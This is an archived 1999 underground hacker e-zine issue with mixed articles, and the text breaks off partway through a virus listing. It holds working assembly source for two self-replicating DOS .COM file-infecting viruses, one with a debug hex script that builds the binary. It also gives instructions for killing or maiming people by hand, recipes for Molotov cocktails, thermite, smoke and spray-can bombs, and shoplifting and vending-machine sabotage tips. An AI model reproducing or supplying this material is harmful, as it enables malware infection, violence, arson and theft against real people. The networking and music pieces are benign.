Copy Link
Add to Bookmark
Report
Underground Periodical Issue 07
___________ _______________________________________
", / / ___ _.-'' '.
/ / / / /NDERGROUND> .' _ |
/ / / / / _______ / / \ /
/ / / / / / ___ \ / __/_.' /
/ / / / / / /__/ / /.-'' .'
/ / / / / / _____.' /_________..-'
/ / / / /___/ /_ / /
/ / / '.____ __/ / /
| / / / / / /
\ | _.' /__/ERIODICAL> / /
'-._'..-'_______________________________/__..-'
We're On The Up And Up
:..:..::..Issue..::..:..:
Issue 7 November 1999
:..:..::..Staff..::..:..:
CrossFire - Editor
ergophobe (Walrus) - Editor
Mirage - Writer
Devlin - Writer
Pyr0 Proxy / PoZ-i - Writer
Website
http://members.xoom.com/under_p
:..:..::..Email..::..:..:
under_p@yahoo.com
:.:.Alternative Hosts.:.:
http://www.swateam.org
http://surf.to/maquishacker
http://surf.to/awol4life
http://mobboss.dragx.cx
http://walrus.bog.net
http://packetstorm.securify.com
:..::..Introduction.::..:
<*> Welcome to Up7! A lot of things have changed this month,
3 More people (Mirage, Devlin And Pyr0 Proxy) have joined the
Staff. Walrus Has also Been promoted to co-editor because he kept
coming up with such good ideas it was the most sensible thing
to do. Darkflame Has Been kicked from the Up staff because of
inactivity.
We Didn't get ANY mails concerning Up6 in the past month, so get
your asses into gear and tell us what you think. I'm sorry if the
issue was released a bit late this month, this month I've had to
chase people to write us articles (more than usual), heck - we even
have a couple of articles from HuSoft (damned good articles too)
who was the main 'character' in last month's IP Spanking Feature.
Official Cool Person Of The Month: Phreakazoid - For giving me a nice
shiny bt internet dialup :)
Right, on with the mag. Please send feedback and articles to:
under_p@yahoo.com - Most articles sent to us do get included, and you
can plug your website at the end of it if you want.
:..::.:..Contents.:.::..:
<*> 0 - Introduction And Contents...: CrossFire
<*> 1 - Unarmed Hand To Hand Combat.: Pyr0-Proxy
<*> 2 - Tracking Corner.............: Ergophobe
<*> 3 - Random Anarchy..............: PoZ-i
<*> 4 - Networking..................: Mirage
<*> 5 - BT Call Barring.............: CrossFire
<*> 6 - Pity Virus..................: EXE-Gency
<*> 7 - Gelf Virus..................: EXE-Gency
<*> 8 - Hacking Novell Netware......: HuSoft
<*> 9 - Password Security...........: HuSoft
<*> 10 - Tracked Music Reviews.......: Walrus & CrossFire
<*> 11 - 0800 Scans..................: Ergophobe
<*> 12 - Eggdrop Hacking.............: Mob Boss
<*> 13 - Free Calls with Ureach......: Mob Boss
<*> 14 - Playstation Piracy..........: CrossFire
<*> 15 - Disclaimer and End..........: UP Staff
_____ _____ ___ ___ __ __
/ | \| _ \ \ \/ /| | |
/ \ __/ \ / | | |
\ / | \ / | | |
\_____/|__| \/ |__|__|
PRESENTS:
Unarmed Hand To Hand Combat
Part 1 - Attacking
By Pyr0-Pr0xy
First of all, let me say that none of the techniques described here should be used on innocent, defenceless people. Unless you don't like them.
"Attack is the best form of defence" - Sometimes this can be true, and sometimes you might just want to kick the shit out of someone. The following text should be useful.
There are seven areas of your body, which can be used to attack another person:
1) The Knee
2) The Heel of the foot
3) The ball of the foot
4) Middle finger and ring finger end
5) Elbow
6) The knife edge of hand/little finger
7) The Fist/side fist
A fundemental rule, which has to be observed after an attack using any part of the body, is that you must immediately bring back the attacking limb to its starting point. E.g, when you hit someone, you should make contact, then bring your arm back. If you don't, it greatly reduces the effectiveness of the attack.
When attacking someone, (in defence of course), there are certain areas of the body that you should always aim to hit. A blow to one of these areas can bring down a man much quicker than repeated blows to an inneffective area.
They are:
The top of the head - not very useful, unless you have a baseball bat.
Between the Eyes - Can be poked, or struck with the fist. Causes pain and can break the neck if done with sufficient force.
The temples - A sideways blow, with the little finger edge of the hand, to either temples, or both can cause unconsciousness, and even death.
Behind the ears - If your opponent is already on the ground, and at your mercy, you can inflict great pain by pressing the knuckle of you second finger into the flesh part just behind the ear lobe
The upper lip - This can be hit with the little finger edge of the hand, and with the fist, and causes extreme pain, due to a bundle of nerves being close to the skin
Chin - Can be attacked with the fist or elbow, and can knock someone out if hit with enough force
Neck - If you manage to hit someone in the throat, just above the voice box, it tends to fold the windpip inwards, which isn't a good thing for the owner of the throat.
Pit of the stomach - This spot can be hit with the fist, elbow, knee or can be kicked. It is one of the most vunerable sopts on the body. When kicking your opponent in this spot, keep the toes curved and deliver the blow with the ball of the foot. Withdraw the foot instantly, to delvier maximum force.
The Lower ribs - This hurts like hell, and can cause internal damage. Stuck with the foot, and the fist.
About 5cm below the navel - Kick this. Hard. It Hurts. Lots.
Testicles - Does this really need explanation???!?!
Knee Joint - It can be kicked, from the side, with a downward motion, which snaps the joint.
Generally, there is not many technical techniques that can be used when attacking, that actually work. Your best bet is to attack first, attack fast, and attack hard. Don't stop attacking until your opponent is on the floor, and not moving, and you will be safe from retalliation. Surprise attacks work best, as your opponent has little or no time to prepare himself.
If you *really* don't like someone ;-) , then it is quite simple to kill someone with your bare hands. The main area of weakness is the head and neck. The skull is designed to take shocks fowards and backwards, not sideways. So, a violent sideways blow can, if delivered with sufficient force, kill a person. It should at least render them unconscious.
Breaking a persons neck is a very quick and easy way to send them to their doom. The easiest way to acheive this from behind is to wrap your right arm around around the right side of their head, across the forehead, grasping the left side of their head, and with your left arm, go across your body, and grab the back, right side of their head. Move your hand closer together, with a violent lunge, twisting their head with a sideways motion. Alternatively, you can place your left hand in the pit of their neck, then grab their forehead with your right hand. Push forwards with your left, and backwards with your right.
Finally, let me just say that when attacking, you should always look for weak spots on your opponents body(s). Each person will have a weak spot, some place on their body that you can exploit.
Next time, I will be dealing with how to cover up *your* weak spots, and how to react to, and defend from different attacks.
_____ _____ ___ ___ __ __
/ | \| _ \ \ \/ /| | |
/ \ __/ \ / | | |
\ / | \ / | | |
\_____/|__| \/ |__|__|
PRESENTS:
Tracking corner
~~~~~~~~~~~~~~~
By: ergophobe
Hopefully this will turn into a regular feature as a kind of forum for general information/rants and raves about tracking.
The basic theme I'm going to be exploring this month is the idea of realism within tracked music.
Up until the advent of computers, musicians have been very limited in what they can do with their music. Simple things such as having only two arms have greatly influenced the way that instruments and consequently music have been structured. But all that has changed. Using a tracker, we can now have things which were never possible before such as snare fills and hihats at the same time, or playing 3 notes simultaneously on a flute. This has dramatically shaped the music of our time. Many of the sounds which are used in music today, particularly trance, are only possible because of synthesisers and the sounds and effects which these can create. The reason that we have music such as hardcore, techno and drum 'n' bass is because we can. Music such as this is very technology driven, and advances in the technology which is available are being taken advantage of all the time.
However this is not always a good thing. The classic example is the fact that timestretching samples is now incredibly easy has probably lead to the huge increase in the number of ripoffs being released at the moment in the hardcore scene. Less obvious is the fact that people often forget that these limitations have been lifted. When tracking a piece of techno or hardcore, just about anything goes in terms of physical limitations of your performers. The only thing you need to worry about is a nice DJ friendly intro and outro.
However when tracking a piece of heavy metal, you've got to remember that your drummer can not play 2 bassdrums and pedal a hi-hat at the same time because he doesn't have three legs. In this respect, you need to think very carefully about the way that you use a tracker. Even down to researching the range of notes that certain instruments can play. For example, piccolo's simply do not play low notes.
There is an additional aspect to the idea of physical limitation, which is the idea of speed. You have to think about exactly how fast it is possible for a person to play. A piece at 350bpm may work fine in a tracker, but when you give it to real musicians to play, its simply not going to work.
Finally it is important to consider what variety of the instrument is most appropriate. For most general saxophone parts, alto or tenor is fine, but for those higher notes, soprano is more effective, and for the really low bass parts, a baritone sax is better.
To add extra touches of realism, it is worth thinking about how the piece would actually be played. A pianist will not strike each key with exactly the same velocity every time, there will be slight variations in volume. It is also rare that a saxophonist will play each note exactly the same and completely crisp. If you listen very closely, you will notice that it is common for the note to bend slightly.
So when you're tracking, take into account the style you are actually composing in, the instruments you are using and what effect you are actually trying to create with them.
ergophobeRandom Anarchy
by PoZ-i
Fun with Fire and Smoke
-----------------------
This may sound obvious, but *much* fun can be had with fire. You'd be
Surprised at the amount of things that burn exceptionally well,
especially with a little help. Here are some ideas.
#1) Flame Throwers
Take any spray can; hold a lighter by the nozzle, and spray!
#2) Car Mayhem
Light something, throw it under a car, and wait for the owner to
come running!
#3) Flour Fire-ball
Get a candle and some flour. Light the candle and put some flour
in your hand. Try various ways of getting the flour to leave your
hand and become dust over the candle flame. The enormous surface
area allows all the tiny dust particles to burn all at about the
same time creating a fireball effect.
#4) Molotov Cocktail
This now famous device is easy to make, but deadly when used.
Simply take a glass bottle (a milk bottle will do fine) and fill
with 3/4 petrol or lighter fluid, and 1/4 oil. Shake this mixture
well. Dip a piece of torn rag into the mixture, and stuff it into
the neck of the bottle. If no rags are available, a tampon works
just as well. Light the rag, then throw the bottle, making sure it
smashes. The oil makes the mixture stick to surfaces.
#4) Fire Fudge
Take some flour, and mix it in with petrol. The resulting mixture
should have a dough like consistency. You could throw it at a window
or wall, and then light, or you could make a modified molotov cocktail
with it. (see above)
#5) Carrier Bags
Take some carrier bags, and stuff then into a crack in a window, or on
someone's doorstep. Burn them, and they melt to form a sticky gooey mess
that is very hard to remove!
#6) Thermite
This one needs some before hand preparation, so plan a week ahead.
Thermite is basically a material, that when lit, takes advantage of
the extremely hot (2200 degrees C) exothermic reaction that is produced
when finely powdered aluminum filings are mixed with Ferric Oxide (rust)
The two materials should be mixed at a 50/50 ratio, and gently heated
until the iron glows red hot. The resulting material, when lit, will
burn through most materials, including carbonized steel! It is very
difficult to light however, and the best way to do so is using a
magnesium strip.
#7) Smoke!
This crude but effective smoke bomb will produce *a lot* of smoke when
made correctly. Simply mix together Potassium Nitrate (also known as
Salt Petre) and sugar, in the ratio 3:1. Add some sulfur for some more
smoke if necessary. Heat the mixture in a tin can gently, as you don't
want a whole batch of this stuff going off in your kitchen. Heat it
until the sugar melts. You should now have a white mixture, with sticky
lumps in it. Simply throw a camping match in the tin to light! A fuse
is recommended, as the amount of smoke this baby produces will turn heads.
I know from experience that this is *very* effective!
#8) More smoke!
This is another way to make lots of smoke, very easily. Simply mix
6g of zinc powder with 1g of sulfur powder. Stick a red-hot wire into
the mixture, and stand back, as much smoke is produced.
#9) Spray-can bomb.
This relatively small explosive is perfect if you are short of any
'proper' explosive materials. It uses the gases inside a spray can
(butane, propane) to create an mild explosion.
You will need:
1) a spray can (WD-40 is best, as the oil is also flammable, but any old deoderant can will do)
2) firelighters (if no firelighters are avaiable, then a bundle of rags
soaked in petrol or lighter fluid would work)
3) Something to light it with
4) a large elastic band or piece of string
Take the cap and the nozzle off the can, then using the elastic band or
string, tie the fire lighters, or your other flammable material to either
side of the can.
Now light the flammable material, and run! you will have around 30 secs
to a minute, depending on what materials you used. When the can heats up enough, it will explode, lighting the contents, and producing a loud bang!, accompanied by a reasonable fireball.
The more cans that are used, the louder, and larger the explosion!
Stealing
--------
Stealing stuff from shops if surprisingly easy, especially if you have
a mate to help. Most shop keepers are so dumb they wouldn't notice if
you took the till away from under their noses.
however, People don't notice stuff, but camera's do.
*Never* take anything when in view of a camera, (unless you are on
holiday in Germany of course) unless you want to get caught.
Understand though, there are different types of camera. First there are
the ones that are totally fake. These are tricky to spot, but they usually
have a 'realistic' flashing light. My advice is don't risk it, there are
easier places to rob from. Leave any cameras alone, unless they are the
type that don't actually record anything, they just let the shop keeper
look at the other end of the shop. If these are in place, simply get a
friend to distract the dick behind the counter, while you get the
stuff. This is probably the best method to steal anything. Get a friend
or friends to go in one area of the shop, and look really suspicious.
All attention will be diverted to them, while you take the stuff.
When taking stuff, the best clothes to wear, are combat trousers (the type
with really big pockets in the legs), and any jacket with many pockets,
especially the hidden type. Also wear a cap, so that if you are accidentally
caught on camera, it will be harder for them to recognize you.
If you do happen to notice a shopkeeper following you after you have taken
something, simply replace the items on a shelf, any shelf. If they take you
in when you still have stuff in your pockets, but you haven't left the shop,
simply say that you haven't had the chance to pay, and that you had every
intention of paying. Even if you get prosecuted, they won't have any kind of
a case against you, as you could have still paid.
Coin Vending Machines
---------------------
This is an idea to fuck over a coin vending machine:
Most modern machines work by passing an electric current through the coin, and
judging the value of it by the amount of resistance it offers. So what would
happen if you were to pour a salt-water solution into the coin slot? The whole
fucking machine would start throwing out money and chocolate randomly! Try it! You'll Like It!
A Series On Networking
1) Who is that guy Mirage ?
2) Networking
Hello readers of UP, this is my first article for UP and I hope you like it.
To those of you who don't know me, you would if you hang on the krash server shame
on you. Well you can catch most of us there on the weekend on krash.dyndns.org 6667.
These are some of the popular channels #apt, #hdc, #krash, #cocytusUK but keep your
eyes open for others. Well some of you are probably wondering who is this guy Mirage ?
Well erm... in a nutshell i'm a person very curious about computer security issues
and generally anything to do with comuters. Ok my first article will be on networking
from the basics to more advanced techniques used; from my experience anyway. This will be in a long line of articles so stay tunned!
-Mirage-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=--=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
To start of the series of tutorials we are first going to take a beginners look
at network topologies:
My definition of a network topology is that it is a description of the layout of
communication medium (cabling), and devices on a network (printers, peripheral etc).
In this article I will cover the following topologies: point to point, mesh, bus,
ring, star and hybrid.
Point to point
This is a very simple one basically you have two computers connected to each other
via communication media. Obviously routing is not necessary, as this is a simple
"point to point" topology. It's main use is for file transferring or two player Quake.
This topology is not really used these days but I thought I'd mention it.
Mesh
A Mesh topology basically provides each computer on the network with a point to
point connection. In my experience Mesh topologies most of the time can provide
fast, reliable data transmission. The reason why Mesh aren't so widely used is for
the simple reason that they waste communication channels; which in a growing
company would very impratical. Despite the advantages of having a dedicated
connection the wasting of communication channels just isn't practical.
Bus
This is the most commonly used well from what i've seen. A Bus topology as it's
name suggests uses a single communication medium (usually coaxial) to transmit
data. This works pretty simply e.g. erm... short links of cable tap directly into
the main Bus simple as I said. At each ends of the Bus are terminating devices
which prevent echoing when the signal reaches the end of the main Bus. If you don't
know what echoing is well its simple it would produce the effect of multiple
signals on the main Bus. I remember a friend had set up a network using this
topology and asked me to see why it wasn't working it was so easy to fault find,
it was just a badly made cable that wasn't built right. He said he spent over 3
hours trying to fix the network. The twat even formatted all the computers and
started again DOH! So remember to check you cabling first.
Ring
This is a real irritating network if one computer goes down so do all of them.
Righty then well this topology connects computers in a continuous loop. On the
upside signal quality on these networks is good as the signals are retransmitted
by each computer to the next computer and so on the signal keeps getting relayed.
The reason why I say this is an upside is because there is very little loss in
signal quality as the signal is always being replayed.
Star
Things start to get more interesting here with the introduction of hubs in
networks. In a Star topology the cabling branches out from a central hub. Then
the hub transmits signals from computer to computer, nice huh. If your not a tight
git and you invest in a decent hub you can pick one up that will increase the signal
quality over the network and wait for it yes you guessed it keep portions of the
network in operation should a cable break or other problem occur. There not that
expensive to put together actually and fault finding is so easy. On the downside
it has a low data rate.
Hybrid
In my experience I have found that Hybrid topologies can be very tricky to
establish and manage. Well Hybrid topologies have to combine two or
more to be considered a Hybrid topology. A lot of wide area network's (WAN's) use
this topology as they have the ability to connect several local area network's
(LAN's. Oh yeah and they can be dame expensive and trouble shooting can really
be dawnting.
Well readers thats it for this issue stayed tunned for the next issue which we
will be looking at communication medium.
-Mirage-
UIN:54387080
E-mail:dk306@hotmail.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Hope You Enjoyed It!
Mirage
| _> _ _ ___ ___ ___| __><_> _ _ ___
| <__| '_>/ . \<_-<<_-<| _> | || '_>/ ._>
`___/|_| \___//__//__/|_| |_||_| \___. Presents....
Bypassing BT Call Blocking
v1.0
This file comes about after a phone conversation with Walrus, in which he told me someone had emailed him asking about getting past Bt Call Blocking. Because of a certain £225 Phone Bill, my Parents decided to put Call Blocking on our phoneline. Bastards. From What I can gather, Call Barring works by The Line owner entering a pin (duh), and after which a connection seems to be made to a BT Number, on which a fake dial tone is made.
One Way I have found to circumvent this, is If you have a mobile phone or similar, call Up the 17070 Outdial that Ergophobe Mentioned last month (0800 373983) , and select the Cable Pair Identification Feature. Cable Pair Identification basically is a feature that Engineers can use to test lines, cutting off all traffic to the line in the process (And no It doesn't work on freeserve <g>). From My Findings, this temporarily allows you to make a call, but you have to be quick, because the barring comes back on pretty soon.
Another, More Foolproof way to Bypass Call Barring is to try Hacking the Pin Code. From what I've found out, the pin code is 6 numbers long, but the line owner does NOT Select the pin, so don't bother trying your pets second cousins brother in law's wife's birthdate - It aint worth it.
Once You've Hacked the code, your going to want to deactivate the barring (duh), and to do that you need a special code - here is a list of all the codes that activate / deactivate various things in the BT System (Thanks To EXE-Gency For These):
141 withhold number
1471 gives details of last number to call you
1474 call the last number to call you.
1470 un-withhold your number if you have a perm-=Withhold-
150 - BT Customer Service
151 - BT Fault Reporting
155 - International Operator
153 - International Directory Enquiries
192 - UK Directory Enquiries
*21* - Divert all calls
*#21# - Check divert (high tone on/low tone off)
#21# - cancel divert
*261# - Barrs all Incoming calls
*#261# - Check incoming call barring
#261# - Cancel incoming call barring
*34x# - Switch ON Call Barring (where x = option number)
*#34x# - Check Call Barring
#34x*PIN# - Cancel Call Barring option
#34*PIN# - Cancel All Call Bars
Call Bar Options - 1 - bars almost all calls/allows 999/151
2 - bars calls starting with "0"
3 - bars international calls
4 - bars calls starting with 1 except 151
5 - bars calls using *
6 - bars premium rate adult services
7 - bars all premium rate services
*41# - Switch Call Waiting on
#43# - Switch Call Waiting off
*#43# - Check Call Waiting status (high tone on/low tone off)
*52# - Details of last outgoing call (Gives number)
#52# - Delete details of last call
*54# - Redial last outgoing call.
*61* - Divert if no reply
*#61# - Check divert
#61# - Cancel divert on no reply
*62*xxxxxxxxx# - Divert on NOT AVAILABLE (Currently not installed
*65*xxxxx# - Not sure what this does. (need pin number)
*66*xxxxxxxxx# - Divert on No Reply and Busy..
*67* - Divert if busy
*#67# - Check divert
#67# - Cancel divert on busy
Yeah, Short File I know, but I hope you find it useful. Please Send All Feedback / Flames / Death Threats / Bribes to: crossfire@antionline.org .
_____ _____ ___ ___ __ __
/ | \| _ \ \ \/ /| | |
/ \ __/ \ / | | |
\ / | \ / | | |
\_____/|__| \/ |__|__|
PRESENTS:
The Pity Virus
By EXE-Gency
Comment #
ÛßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßßÛÄ¿
Û T H E ( P I T Y ) V I R U S Û ³
Û B Y E X E - G E N C Y Û ³
ÛÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÜÛ ³
ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ
Okay, this the the very first non-overwriting virus I wrote.
Here are some details about the Pity virus:
Name : Pity
Author : EXE-Gency
Size : about 500 bytes (file growth)
Type : Non-resident, non-overwriting, non-encrypted.
Targets : *.COM
Stealth : Restores files attributes, time and date stamp
General : Infects all files in the current directory.
Searches current directory with FindFirst/Next functions.
Won't re-infect files.
Won't infect files whose first two bytes add up to 167 (such
as MZ or ZM in .EXE files)
Won't infect files smaller than 500 bytes (1F4h.)
Won't infect files larger than 60,000 bytes (EA60h.)
Won't infect files whose name is recognised by the filemask
CO*.COM so as not to infect the file COMMAND.COM.
Uses the JMP instruction (E9h) as it's infection marker.
Puts the DTA (Disk Transfer Area) at the bottom of the file
during execution, so that the parameters to .COM files
are not overwritten when called to FindFirst (4Eh) and
FindNext (4Fh) functions.
To assemble type: TASM PITY.ASM
TLINK /T PITY.OBJ
DO NOT RUN THE PITY.COM FILE IT IS THE VIRUS!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
#
Prog segment
assume cs:Prog, ds:Prog
org 0100h ; Leave room for PSP
Begin: db 0E9h, 00h, 00h ; JMP The Start
; (1st generation only)
TheStart: call Get_Delta ; Push IP
Get_Delta: pop bp ; Pop IP into BP
sub bp, offset Get_Delta ; Get File Size
lea si, [bp + Buffer] ; SI points to buffer
mov di, 0100h ; DI points to 1st byte
movsb ; Move 1 byte
movsw ; Move 1 word (2 bytes)
mov ah, 1Ah ; Set DTA
lea dx, [bp + TheEnd] ; To end of virus
int 21h ; Do it!
mov ah, 4Eh ; FindFirst
lea dx, [bp + FileMask] ; DX points to *.COM
mov cx, 0007h ; File attribs
FindNext: int 21h ; Do it!
jnc $+5 ; No error? Continue
jmp ReturnToHost ; No more files!
mov ax, 4301h ; Set attribs
mov cx, 0000h ; To zero
lea dx, [bp + TheEnd + 1Eh]; DX points to FileName
int 21h ; Do it!
jnc $+5 ; No error? Continue
jmp FindMore ; Error? Find another
mov ax, 3D02h ; Open file R/W
lea dx, [bp + TheEnd + 1Eh]; DX points to FileName
int 21h ; Do it!
jnc $+5 ; No error? Continue
jmp FindMore ; Error? Find another
xchg ax, bx ; BX=File Handle
mov ah, 3Fh ; Read file
mov cx, 03h ; 3 bytes
lea dx, [bp + Buffer] ; Put in buffer
int 21h ; Do it!
lea cx, word ptr [bp + offset Buffer]
; Put first 2 bytes into CX
add cl, ch ; Add together
cmp cl, 0A7h ; Is it MZ or ZM?
je RestoreAttr ; Yep, close file
cmp byte ptr [bp + Buffer], 0E9h ; Infected?
jne $+5 ; No, continue
jmp RestoreAttr ; Yep, restore+close
cmp word ptr [bp + TheEnd + 1Eh], 'OC'
; COMMAND.COM file?
jz RestoreAttr ; Yep, close file
mov ax, 4202h ; Goto EOF
mov cx, 0000h
mov dx, 0000h
int 21h ; Do it!
sub ax, 03h ; reduce by 3
mov word ptr [bp + JumpBytes+1], ax
; Append offset to JuMP instruction
cmp ax, 01F4h ; Less that 500 bytes?
jb RestoreAttr ; Yep! Find more
cmp ax, 0EA60h ; More than 60,000?
ja RestoreAttr ; Yep! Find more
mov ah, 40h ; Write file
mov cx, TheEnd - TheStart ; CX = Virus size
lea dx, [bp + TheStart] ; Beginning of virus
int 21h ; Do it!
mov ax, 4200h ; Set file pointer to start of file
mov cx, 0000h
mov dx, 0000h
int 21h ; Do it!
mov ah, 40h ; Write file
mov cx, 03h ; 3 bytes
lea dx, [bp + JumpBytes] ; DX points to buffer
int 21h ; Do it!
RestoreAttr: mov ax, 4301h ; Set file attribs
mov cx, word ptr [bp + TheEnd + 15h] ; From DTA
lea dx, [bp + TheEnd + 1Eh]; DX points to filename
int 21h ; Do it!
RestoreTDStamp: mov ax, 5701h ; Set file time/date
mov cx, word ptr [bp + TheEnd + 16h] ; from DTA
mov dx, word ptr [bp + TheEnd + 18h] ; from DTA
int 21h ; Do it!
CloseFile: mov ah, 3Eh ; Close file
int 21h ; Do it!
FindMore: mov ah, 4Fh ; Find Next
jmp FindNext ; Call int 21h
ReturnToHost: mov ah, 2Ch ; Get time
int 21h ; Do it!
cmp dl, 00h ; sec=0?
je DisplayMessage ; Yep, display message
Restore: mov ah, 1Ah ; Set DTA
mov dx, 80h ; Back to ofs 0080h
int 21h ; Do it!
mov ax, 0100h
push ax ; Push 100h
ret ; Ta ta!
DisplayMessage: mov ah, 09h ; Display message
lea dx, Message ; DX holds offset
int 21h ; Do it!
int 20h ; Return to OS
FileMask db '*.COM', 00h ; ASCIIZ File Mask
Message db '[Pity] Virus '
db 'Written by EXE-Gency!'
db 0Dh, 0Ah, '$' ; Message
Buffer: db 90h, 0CDh, 20h ; NOP, INT 20h
JumpBytes db 0E9h, 00h, 00h ; JMP offset
TheEnd: ; Where to put DTA
Prog ends ; Fin!
end Begin ; Fin II !
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
If you don't have TASM/TLINK, just copy and past the debug script below to a
new text file and then type:
debug < filename
and a file called pity.com will appear. This is the virus.
N PITY.COM
E 0100 E9 00 00 E8 00 00 5D 81 ED 06 01 8D B6 23 02 BF
E 0110 00 01 A4 A5 B4 1A 8D 96 29 02 CD 21 B4 4E 8D 96
E 0120 F8 01 B9 07 00 CD 21 73 03 E9 AE 00 B8 01 43 B9
E 0130 00 00 8D 96 47 02 CD 21 73 03 E9 98 00 B8 02 3D
E 0140 8D 96 47 02 CD 21 73 03 E9 8A 00 93 B4 3F B9 03
E 0150 00 8D 96 23 02 CD 21 8D 8E 23 02 02 CD 80 F9 A7
E 0160 74 52 3E 80 BE 23 02 E9 75 03 EB 48 90 3E 81 BE
E 0170 47 02 43 4F 74 3E B8 02 42 B9 00 00 BA 00 00 CD
E 0180 21 2D 03 00 3E 89 86 27 02 3D F4 01 72 26 3D 60
E 0190 EA 77 21 B4 40 B9 26 01 8D 96 03 01 CD 21 B8 00
E 01A0 42 B9 00 00 BA 00 00 CD 21 B4 40 B9 03 00 8D 96
E 01B0 26 02 CD 21 B8 01 43 3E 8B 8E 3E 02 8D 96 47 02
E 01C0 CD 21 B8 01 57 3E 8B 8E 3F 02 3E 8B 96 41 02 CD
E 01D0 21 B4 3E CD 21 B4 4F E9 4B FF B4 2C CD 21 80 FA
E 01E0 00 74 0C B4 1A BA 80 00 CD 21 B8 00 01 50 C3 B4
E 01F0 09 BA FE 01 CD 21 CD 20 2A 2E 43 4F 4D 00 5B 50
E 0200 69 74 79 5D 20 56 69 72 75 73 20 57 72 69 74 74
E 0210 65 6E 20 62 79 20 45 58 45 2D 47 65 6E 63 79 21
E 0220 0D 0A 24 90 CD 20 E9 00 00
RCX
0129
W
Q
_____ _____ ___ ___ __ __
/ | \| _ \ \ \/ /| | |
/ \ __/ \ / | | |
\ / | \ / | | |
\_____/|__| \/ |__|__|
PRESENTS:
The Gelf Virus
By EXE-Gency
Comment #
ÉÍÍÍÄÄ ú ú ÄÄÍÍÍ»
º ( GELF ) º
º b y E X E - G e n c y º
ÈÍÍÍÄÄ ú ú ÄÄÍÍͼ
Another old virus. The only difference between this and the Pity
virus is that it's encrypted.
Virus Name : Gelf
Author : EXE-Gency
Size : 1B6h bytes (file growth)
Type : Non-overwriting, non-Resident, encrypted.
Targets : *.COM files
Stealth : Infects files with any attributes.
Restores file's time/date stamp and attributes.
General : Infects all files in the current directory and works it's
may to the root with '..' calls. (Also restores original
directory.)
If it's the 1st of January, some details about Gelf will
be displayed on the screen. The computer will then wait
for a key press then re-boot the machine.
Assembling : TASM GELF.ASM
TLINK /T GELF.OBJ
DO NOT RUN THE GELF.COM FILE IT IS THE VIRUS!
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
#
prog segment ; Setup segments
assume CS:prog, DS:prog; CS+DS in same seg
org 100h ; .COM file
Main: db 0E9h, 00h, 00h ; Jump to VirusStart
VirusStart: call GetDelta ; Get DeltaOffset
GetDelta: pop bp ; Pop IP
sub bp, offset GetDelta ; BP=Delta Offset
mov ah, 2Ah ; Get Date
int 21h ; DOS Int
cmp dx, 0101h ; 1st January? 1/1/??
jne NoPayload ; No -> Dont display msg
mov ah, 09h ; Write string
lea dx, VirusInfo ; DX points to VX info
int 21h ; DOS Int
mov ah, 01h ; Get Keypress
int 21h ; DOS Int
int 19h ; Reboot (but not in WIN95)
NoPayload: call Encrypt_Decrypt ; Decrypt virus
jmp RestoreOldBytes ; Restore 1st 3 bytes of host
EncryptionVal dw 0000h ; Enc/Dec val (0=no encryption)
WriteCode: call Encrypt_Decrypt ; Encrypt virus
mov ah, 40h ; Write Virus
mov cx, offset virusend-virusstart ; Virus size
lea dx, [bp + virusstart] ; Start of Virus
int 21h ; DOS Int
call Encrypt_Decrypt ; Decrypt
ret ; Return
Encrypt_Decrypt:mov bx, word ptr [bp + EncryptionVal]
lea si, [bp + RestoreOldBytes]
mov cx, [offset Random - offset RestoreOldBytes]
XORAgain: xor word ptr [si], bx
inc si
inc si
loop XORAgain
ret
RestoreOldBytes:lea si, [bp + buffer]
mov di, 0100h
movsb
movsw
mov ah, 1Ah
lea dx, [bp + virusend]
int 21h
mov ah, 47h
mov dl, 00h
lea si, CurrentDir
int 21h
FindFirst: mov ah, 4Eh
lea dx, [bp + FileMask]
mov cx, 0000h
FindNext: int 21h
jnc $ + 5
jmp DoParent
mov ax, 4301h
mov cx, 0000h
lea dx, [bp + VirusEnd + 1Eh]
int 21h
jnc $ + 5
jmp FindMore
mov ax, 3D02h
lea dx, [bp + virusend + 1Eh]
int 21h
jc RestoreAttribs
xchg ax, bx
mov ah, 3Fh
mov cx, 0003h
lea dx, [bp + buffer]
int 21h
jc RestoreAttribs
cmp byte ptr [bp + buffer], 0E9h
jz RestoreAttribs
mov ax, 4202h
mov cx, 0000h
mov dx, 0000h
int 21h
jc RestoreAttribs
sub ax, 03h
mov word ptr [bp + jumpbytes + 1], ax
Random: mov ah, 2Ch
int 21h
add dl, dh
cmp bx, 00h
je Random
mov word ptr [bp + EncryptionVal], bx
call WriteCode
mov ax, 4200h
mov cx, 0000h
